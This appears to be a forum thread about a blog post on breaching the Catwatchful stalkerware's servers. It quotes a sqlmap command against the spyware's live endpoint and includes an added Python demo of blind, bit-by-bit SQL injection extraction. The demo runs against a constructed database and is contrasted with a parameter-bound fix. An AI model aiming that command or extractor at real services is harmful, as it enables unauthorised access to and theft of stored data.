sqlmap -u 'https://catwatchful.pink/webservice/servicios.php?operation=getDevice&imei=M6GPYXHZ95ULUFD0'
...
sqlmap identified the following injection points
This was the wildest part to me. I'd heard of sqlmap but I didn't realize it was so good that you can just hand it a URL that hits the database and the tool basically figures out from there how to dump the database contents if there's any SQL injection vulnerability.

> Intercepting my test phone’s traffic confirms that the files are directly uploaded to Firebase, and reveals that the commands for features like live photos are also handled through FCM. This is going to reduce our attack surface by a lot - nothing in Firebase is going to be IDORable or vulnerable to SQLI, and some quick testing eliminates any of the usual traps like open storage buckets or client-side service account credentials.
I was surprised at how the malware devs made such sloppy mistakes but being on Firebase protected them from more severe vulnerabilities. I've seen other vendors get popped by configuring Firebase incorrectly, but it seems like if you configure the basics right, it cuts down the attack surface a lot.
The blog correctly explains how it has become pretty useless in our age where no one writes their own database integration anymore and everyone uses off-the-shelf components, but man... I remember a time when it felt like literally every sufficiently complex web service was vulnerable to SQL injection. You could write a small wrapper for sqlmap, hook it up to the results of a scraper, let it run overnight on every single piece of data sent to the server, and the next day you'd have a bunch of entry points to choose from. It even handled WAFs to some degree. I've been out of it-sec for several years now, but I still remember every single command line argument for sqlmap like it was yesterday.
Chances are that these hackers are bypassing that filter without even realizing it.
I easily see people claiming they are the target of a foreign government because it gives them importance and it is less shameful than a spam botnet.
If there's one lesson I'd convey to people about security it is do not underestimate your foes. They've been building tools for decades just like any other discipline.
Tech to find a hole in your system that lets you run an arbitrary-but-constrained fragment of shell code that can put a small executable on to the system that puts a larger executable on that lifts itself up to root and also joins a centralized command-and-control server with the ability to push arbitrary code across entire clusters of owned systems is not some sort of bizarre, exotic technology that people only dream of... it's off-the-shelf tech. It's a basic building block. Actually sophisticated attackers build up from there.
If $YOU're operating on the presumption I see so often that the script kiddies blind-firing Wordpress vulnerabilities at servers is the height of attacker's sophistication $YOU are operating at an unrecoverable disadvantage against these people.
Even better, it knows how to exploit blind SQLi and has a number of tricks for doing so: it can often tell if a query is succeeding or failing based on HTTP error codes, and it will do things like try various SLEEP() injections to see if it can hang the server. If it finds any blind SQLi opportunities, it has the ability to dump the entire database *one bit at a time* by just doing a ton of requests in parallel.
You can actually hand it a file full of HTTP request headers and it'll automatically figure out where the potential injection points are, and send a bunch of requests formatted identically to the provided headers. You can practically automate SQL injection testing with a suitable MITM proxy and some scripting.
It has options for disguising requests, for bypassing WAFs, for submitting requests using custom protocols, and a ton more. Just a really well designed tool overall.
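The blind, bit-at-a-time extraction described in the comment above, as an added example (this is not code from Daigle's write-up or from sqlmap): a constructed lookup endpoint that answers only with an HTTP status, the boolean oracle built on top of it, and the same extractor run against a parameter-bound version of the endpoint, where the injection check fails and nothing is recovered. The table, column and row contents, the `admin` password and the IMEI values are made up for the demo. Only the status-code (boolean) variant is shown; a time-based variant would swap the status check for a response-time threshold and otherwise work the same way.

```python
import sqlite3

# Constructed value that exists in the sample table, so the base query returns a row.
KNOWN_IMEI = "111111111111111"


def make_db():
    """Constructed sample database standing in for the spyware backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE devices (id INTEGER PRIMARY KEY, imei TEXT NOT NULL)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO devices (imei) VALUES (?)",
                     [(KNOWN_IMEI,), ("222222222222222",)])
    conn.execute("INSERT INTO users (name, password) VALUES ('admin', 'Tr0ub4dor')")
    conn.commit()
    return conn


class Service:
    """Lookup endpoint whose only observable output is an HTTP status code."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0          # lets us see what the extraction costs

    def get_device(self, imei):
        self.requests += 1
        try:
            row = self._lookup(imei)
        except sqlite3.Error:
            return 500             # broken SQL; the oracle treats this as "false"
        return 200 if row else 404


class VulnerableService(Service):
    def _lookup(self, imei):
        # Attacker-controlled text is spliced into the SQL grammar.
        return self.conn.execute(
            f"SELECT id FROM devices WHERE imei = '{imei}'").fetchone()


class HardenedService(Service):
    def _lookup(self, imei):
        # Parameter binding: the same text can only ever be a literal value.
        return self.conn.execute(
            "SELECT id FROM devices WHERE imei = ?", (imei,)).fetchone()


def oracle(service, condition):
    """True if AND-ing `condition` onto the query still returned the known row."""
    payload = f"{KNOWN_IMEI}' AND ({condition}) -- "
    return service.get_device(payload) == 200


def injectable(service):
    """Confirm the injection point: a tautology and a contradiction must differ."""
    tautology = oracle(service, "1=1")
    contradiction = oracle(service, "1=2")
    return tautology and not contradiction


def extract(service, subquery, max_len=127):
    """Recover the scalar result of `subquery` one bit at a time via the oracle.

    Assumes an ASCII result (7 bits per character). Returns None if the
    endpoint does not behave like an injection point.
    """
    if not injectable(service):
        return None

    def read_int(expr, bits):
        value = 0
        for bit in range(bits):
            # SQLite: & binds tighter than =, so this tests one bit of expr.
            if oracle(service, f"(({expr}) >> {bit}) & 1 = 1"):
                value |= 1 << bit
        return value

    length = read_int(f"length(({subquery}))", 7)
    chars = []
    for pos in range(1, min(length, max_len) + 1):      # substr() is 1-based
        chars.append(chr(read_int(f"unicode(substr(({subquery}), {pos}, 1))", 7)))
    return "".join(chars)


def demo(service_cls, target="SELECT password FROM users WHERE name = 'admin'"):
    """Run the extraction against a fresh database; returns (value, requests)."""
    svc = service_cls(make_db())
    return extract(svc, target), svc.requests


if __name__ == "__main__":
    print(demo(VulnerableService))   # ('Tr0ub4dor', 72)
    print(demo(HardenedService))     # (None, 2)
```

Seven requests for the length plus seven per character is why the real tool parallelises; the hardened endpoint costs the attacker only the two confirmation requests before the extractor gives up.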
In many cases it's just not something that's taught at school or that is covered in training. So it's a mindset that just isn't there, even when they're great at other parts of the craft.
If you're building anything that is going to be exposed to the public Internet and you aren't, at some point, going through the exercise of "how can people break or abuse or hack this" then you're missing a step for sure.
> A: Yes, you can monitor a phone without them knowing with mobile phone monitoring software. The app is invisible and undetectable on the phone. It works in a hidden and stealth mode.
How is that even possible on a modern Android? I'd think one of the explicit goals of the security model would be to prevent this.
But as the TechCrunch author stated, oftentimes alerting the stalker can be dangerous for the victim.
> Google said it added new protections for Google Play Protect
But the screenshot of the device settings in the article shows that the app has you turn off Google Play Protect. So does this even do anything?
Meanwhile Google (via its firebase brand) is apparently continuing to act as a host for this app...
This doesn't sound like a satisfying step in debugging. On the other hand, confirms my appliance feelings.
> Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
I don't know the legal footing these spyware apps stand on, but this blog post seems like exhibit A if Catwatchful ever decided to sue the author, or press criminal charges. Hacking, even for reasons that seem morally justified, is still illegal.
But Daigle probably did consider being liable and what would be morally justified.
It must have been tempting to try to use the Catwatchful app to notify the victims that they are being stalked. E.g., by getting phone numbers or social media handles and then SMS/DM the victims (if the app reveals the victims handles in the recorded conversations)
Or getting the IMEI numbers and handing them over to network operators or local authorities who could do the notification.
It would probably help many victims, but it could go wrong in some cases.
Do you really think that the users of a stalker app care if the app got "hacked" once or twice? Do you also think that the app makers themselves really want to remind the legal world that this stuff is legal when i bet you >50% of their users probably installed it on devices that aren't theirs? IDK, personally I would avoid the law at all costs if I released something this shady.
They never disclosed to the target company (not that I think they should have), this is definitely not white hat. This is essentially the grey-hat version of vigilantism.
They disclosed it to a journalist and now on their blog.
They probably need to engage an attorney now.
However, next time he talks about emulating Nintendo games or whatever, I'm sure Nintendo lawyers would love to bring it up and point out "how the defendant brazenly defies law and order with predetermined malice".
Not to begin to even mention now some shady criminal might hold a grudge against Daigle. I hope his security is air tight.
There is a reason these reports are usually anonymous or follow responsible disclosure.
This seems like a straw man, though? What if they just... continue to not do that? (I think this is what the other commenter meant with "concern trolling".)
> Not to begin to even mention now some shady criminal might hold a grudge against Daigle.
This is 1) not a problem a lawyer will help you with and 2) not a practical concern for most people in the US and Canada. For example, Brian Krebs continues to (read: he's not dead or otherwise intimidated into silence) put his name behind many similar reports of illegal activity. There is a reason law enforcement investigates and prosecutes violent crime.
I don't really see a practical reason for this person to avoid putting their name behind this report. The only reason that seems to make sense is if this group is not a criminal enterprise. Then they might be at all inclined to file a lawsuit.
Brian Krebs invests a huge amount into keeping his home address a secret and has extensive surveillance at his home to keep intruders out. He was once SWATed and another time someone ordered heroin to his home and called the police to frame him for drug trafficking.[0]
It's a bit of a miracle that Krebs continues his reporting. Krebs' courage and opsec are not very easy to achieve, especially for a 23 year old blogger like OP.
I agree that he’s courageous but only because he receives many threats, not because he faces imminent dangers. His protection comes from the fact that a criminal enterprise will only bring attention to themselves by purchasing his murder, which is true because law enforcement investigates and prosecutes violent crime.
The article says that he moved to a new home because of these incidents and now takes extreme measures to keep his address a secret.
I don't understand how you can make the argument that retribution from criminals is "not a practical concern" because Krebs still does his reporting in spite of the risks. SWATing and attempts to frame him for a serious crime aren't just threats - they occurred. He could have died or been imprisoned.
Are there documented cases of botnet owners trying to sue or get law enforcement to prosecute someone for infiltrating their botnet?
I'd be more concerned about extralegal retaliation from people in the malware ecosystem.
Stranger things have won in court
Without hard proof that the author did what they said they did, you have no real case. This particular story already sounds far fetched but makes good fantasy.
https://techcrunch.com/2025/07/02/data-breach-reveals-catwat...
People will continue doing their unethical behaviour not because we aren't on the streets fighting for the right thing, but because we just don't care enough, and let them continue.
Oh dear.